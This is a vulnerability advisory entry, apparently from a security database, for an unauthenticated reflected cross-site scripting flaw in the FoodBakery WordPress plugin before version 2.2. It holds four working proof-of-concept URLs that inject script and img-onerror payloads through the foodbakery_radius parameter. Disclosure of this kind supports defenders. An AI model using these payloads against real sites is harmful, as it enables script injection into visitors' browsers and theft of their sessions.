logo
DATABASE RESOURCES PRICING ABOUT US

FoodBakery < 2.2 - Reflected Cross-Site Scripting (XSS)

Description

The plugin, used in the theme did not properly sanitize the foodbakery_radius parameter before outputting it back in the response, leading to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability. ### PoC http://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=10-alert(document.domain) http://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=10%22%3E%3Cscript%3Eprompt(document.domain)%3C/script%3E http://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=10-prompt(document.domain) http://foodbakery.chimpgroup.com/listings/?search_title=&location;=&foodbakery;_locations_position=filter&search;_type=autocomplete&foodbakery;_radius=%22%3E%3Cimg%20src%20onerror=prompt(/XSS/)//%3E


Affected Software


CPE Name Name Version
wp-foodbakery 2.2
foodbakery 2.2

Related